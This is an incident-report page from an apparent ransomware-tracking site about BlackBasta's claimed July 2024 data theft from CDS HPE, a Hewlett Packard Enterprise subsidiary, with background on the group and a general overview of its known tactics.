In-Depth Analysis of BlackBasta Ransomware Attack on CDS HPE: Data Exfiltration and Impact

Incident Date:

July 15, 2024

World map

Overview

Title

In-Depth Analysis of BlackBasta Ransomware Attack on CDS HPE: Data Exfiltration and Impact

Victim

CDS HPE

Attacker

Blackbasta

Location

Consorzio Tecnocittà, Italy

, Italy

First Reported

July 15, 2024

Ransomware Attack on CDS HPE by BlackBasta: A Detailed Analysis

Overview of CDS HPE

CDS HPE, a wholly-owned subsidiary of Hewlett Packard Enterprise (HPE), operates primarily in Europe, delivering customized technical services and support across various sectors. Established following HPE's acquisition of Synstar, CDS has built a strong reputation in providing infrastructure technical support, including field maintenance, installations, networking support, system administration, and software development. The company employs over 1,500 individuals across ten European countries and reported an annual revenue of approximately $115 million in 2024.

Attack Details

The ransomware group BlackBasta has claimed responsibility for a recent cyberattack on CDS HPE. The attackers have reportedly exfiltrated 500 GB of sensitive data, including company information, confidential documents, human resources and hiring data, personal employee records, client data, and project details. The group has set a ransom deadline for the 23rd of July, 2024, pressuring CDS HPE to comply with their demands to prevent the potential exposure or misuse of the stolen data.

About BlackBasta

BlackBasta is a ransomware operator and Ransomware-as-a-Service (RaaS) criminal enterprise that emerged in early 2022. The group is believed to have connections to the defunct Conti threat actor group. BlackBasta targets organizations in highly targeted attacks, employing a double extortion tactic by encrypting critical data and threatening to publish sensitive information on their public leak site if the ransom is not paid. The group has targeted over 500 organizations worldwide and has made up to $100 million in ransom payments from more than 90 victims since its emergence.

Penetration Methods

BlackBasta employs several strategies to gain initial access to target networks, including spear-phishing campaigns, insider information, and buying network access. Once inside a network, the group uses tools like QakBot, Mimikatz, and exploiting vulnerabilities to move laterally and harvest credentials. For maintaining control over compromised systems, BlackBasta uses tools like Cobalt Strike Beacons, SystemBC, and Rclone. Before encrypting files, the group disables security tools, deletes shadow copies, and exfiltrates sensitive data to maximize their leverage.

Vulnerabilities and Impact

CDS HPE's extensive operations and large workforce make it a lucrative target for ransomware groups like BlackBasta. The company's reliance on customized technical services and support across various sectors, combined with the sensitive nature of the data it handles, increases its vulnerability to cyberattacks. The exfiltration of 500 GB of sensitive data could have significant repercussions for CDS HPE, including potential financial losses, reputational damage, and operational disruptions.

Sources

Recent Ransomware Attacks

The Recent Ransomware Attacks (RRA) site acts as a watchtower, providing you with near real-time ransomware tracking of attacks, groups and their victims. Given threat actors’ overarching, lucrative success so far, ransomware attacks have become the most ubiquitous, and financially and informationally impactful cyber threat to businesses and organizations today.

The site’s data is generated based on hosting choices of real-world threat actors, and a handful of other trackers. While sanitization efforts have been taken, we cannot guarantee 100% accuracy of the data. Attack updates will be made as source data is reported by reputable sources. By viewing, accessing, or using RRA you acknowledge you are doing so at your own risk.